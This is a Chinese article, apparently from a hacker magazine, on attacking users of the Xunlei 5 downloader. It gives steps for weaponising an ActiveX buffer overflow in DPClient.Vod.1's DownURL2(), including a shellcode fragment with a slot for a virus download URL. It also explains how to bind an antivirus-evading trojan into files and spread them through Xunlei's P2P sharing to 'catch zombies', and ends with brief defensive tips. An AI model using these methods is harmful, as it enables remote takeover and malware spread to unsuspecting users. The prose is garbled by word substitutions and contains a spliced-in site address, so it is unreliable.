昨天我到妹妹家玩,看到她在用迅雷5下载电影,不禁得惊出一身冷汗。由于迅雷5最近爆出了一个高危破绽,黑客应用它可以成功远程溢出,控制受益者的电脑,使其成为黑客的“肉鸡”。什么?你没有据说过这个破绽?那就快看看本文,早点做好安保防护。
迅雷5 ActiveX控件可成功远程溢出Web迅雷的高危破绽才爆出没有多久,最近Web迅雷的老大哥,迅雷5也发生了一个高危的破绽。经过测试发现,迅雷 5.6.9.344版本的ActiveX控件上存在多个缓冲区溢出破绽,远程攻打者可以应用此破绽控制用户系统。经过我的实验,迅雷5中的DPClient.Vod.1 ActiveX控件文件,在解决传送给DownURL2()的参数的时刻会形成数据溢出。这样假设用户受骗访问了恶意网页的话,就或者触发软件缓冲区溢出,会让远程攻打者口头恣意指令。恶意代码“攻陷” 迅雷5第一步:首先性能一个木马的服务端程序,而后将它上行到自己的网络空间中,这样就获取了木马地址。如今咱们对这个木马地址启动加密解决。在搜查引擎外面搜查“网页加密”,接着在搜查到的加密网站外面,比如,输入木马地址后点击“Ascii→Unicode”即可。第二步:如今性能迅雷破绽的应用网页。Www.itcoMpUtEr.com.cN由于没有现成的破绽生成工具,因此只要修正网络中现成的破绽代码。在源代码中有如下的一句信息:“%u6946%u656c%u0041%u7468%u7074此处为须要下载病毒的网址%u0000”,如今只须要将加密后的网页木马地址,复制到代码外面指定的位置就可以了。
迅雷杀毒模块的作用网上病毒泛滥,一波未平,一波又起,所以我在下载物品时都要对下载文件启动安保检测。我发现迅雷提供的杀毒模块真的管用,能无偿经常使用驰名的杀毒软件卡巴斯基查杀病毒。首先,咱们运转迅雷,点击“组件→组件治理”命令关上组件治理窗口,接着启用迅雷安保下载组件。接着关上迅雷插件核心网页(ei.com/ind ex.html)下载驳回卡巴斯基杀毒引擎的杀毒模块并装置。而后,重启迅雷,点击“工具→性能”命令关上性能窗口会发现多出了“下载安保”标签。进入该标签后,杀毒模块可以选用“卡巴斯基杀毒模块”,假设须要进一步对扫描和更新战略启动性能,可以进入“杀毒设置”,比如可以设置更新战略为“即时”,这样可以提高病毒库更新的速度。你能否对迅雷附带的卡巴斯基模块杀毒才干抱有疑心态度呢?那么,咱们来下载一个经常出现的病毒来测试一下其性能吧。下载了一个病毒样本包,迅雷发现了5个病毒并揭示删除文件,而经过卡巴斯基相同发现了5个病毒。
就这样破解迅雷抓鸡法人人世最大的悲痛,莫过于人家正在害你,不知情的你还对他疾恶如仇。这样荒诞的事件,只会在电视剧中发生吗?你想过自己也会变成那样吗?假设你不信,看完本文准让你大吃一惊!迅雷抓鸡法最阴毒的就是它共享的捆绑文件令受益者无法发生警觉,反而会由于下载速度优化感到快乐。咱们应该如何防范黑客用迅雷抓鸡呢?上方咱们就来揭开谜底。所属主题:抓鸡系列杀伤力值:★★★操作难度:中等适宜读者:普通读者迅雷抓鸡太隐蔽了由于迅雷经常使用的多资源超线程技术,从而形成共同的迅相同享网络,在很多方面和P2P软件十分相似。但迅雷是让用户将有效的关键信息共享到雷区,当用户下载某个文件信息的时刻,迅雷会在雷区寻觅相反的文件信息,从而有效地提高文件的下载速度。原本这些措施是为了提上下载速度,然而该性能却引来了黑客的目光。黑客正是应用这样的共享,将捆绑有木马的文件共享,当用户下载该文件运转后就会被植入木马。之所以会这样,是由于雷区共享的资源很多,不会惹起用户的留意。其次用户只管可以不到不相熟的网站下载,然而迅雷却做不到这一点。这样木马就滥竽充数地出去了。迅雷抓鸡操作很便捷1.更新迅雷账号黑客要用迅雷抓鸡,首先要领有一个至少是“少校”级别的迅雷账号(图1),这样才可以颁布资源。怎样才干将账号信息更新到这样的级别呢?依据迅雷官网的规则,注册用户(雷友)只须要登录在线1小时即可得2 分,下载一个文件就可以得5分,注册用户在线时长得分每天封顶 20 分,下载文件得分每天封顶 50 分,这样就可以以每天70分的速度更新。小揭示:黑客也或者盗用他人的迅雷账号,这是最省事的方法。2.捆绑免杀木马如今运转全新的捆绑工具Ek Chuah,首先点击“关系设置”中的“基本设置”选项,在“待兼并文件”中设置拔出的文件,也就是咱们生成的下载者木马程序。接着在“宿主文件”设置被拔出的文件选项,这里咱们可以恣意地选用一个罕用的运行程序。程序为提供了三种捆绑方式,这里选用“搜查多余空字节”,它是在程序中搜查外部存在的缝隙,而后把文件扩散拔出到缝隙中(图2)。再点击“初级设置”选项,这里的命令都是用来防止被杀毒软件查杀,设置完后点击“开局兼并”即可。3.颁布捆绑文件捆绑文件成功后将它上行到恣意网络空间中,接着咱们再用迅雷下载。下载后,在下载列表外面,点击该文件链接中的“颁布”按钮,会弹出一个文件引见的“雷区”窗口(图3)。
当迅雷经过网络检测到所须要的文件信息后,就会智能共享给其余正在下载该资源的计算机用户(例如《越狱》)。这样当文件运转以后咱们的木马也就种植上了。想抓我没门首先,不要从不了解的网站下载文件信息,即使是从自以为安保的网站下载文件,下载成功后最好先验证文件的MD5码,以保障文件没有被其他人修正过。小揭示:普通网站下载会提供一个MD5码,用户下载以后用MD5程序对下载的文件启动计算,假设获取的MD5相反就示意文件没有被修正。其次,即装置最新版本的杀毒软件,并将病毒库更新到最新。这样当捆绑文件合成运转的时刻,假设检测到病毒木马程序就会立刻启动查杀,从而有效地包全系统的安保。运转《网页木马阻拦器》这款安保工具,该软件的性能和Windows Vista系统的UAC很相似。无论是捆绑木马还是用户运转的安保工具,在运转的时刻都会进一步地揭示用户加以确认(图4)。
攻防博弈攻 黑客:文中用的方法比拟奇妙,属于被动进攻型,比弄到迅雷博客外面,等人下载强多了。此外,还有一些更新更隐蔽的抓鸡方法,让人防不胜防!例如还可以自制一个图片传给受益者,当它被关上时,就经常使用了4444端口,而后咱们可以远程控制受益者了。防 编辑:文件捆绑确实让人感到很辣手,咱们可以先在虚构机或影子系统中运转下载文件,等确安保后再在本地运转也不迟。至于特制图片入侵,咱们只须将4444端口封锁即可。
From: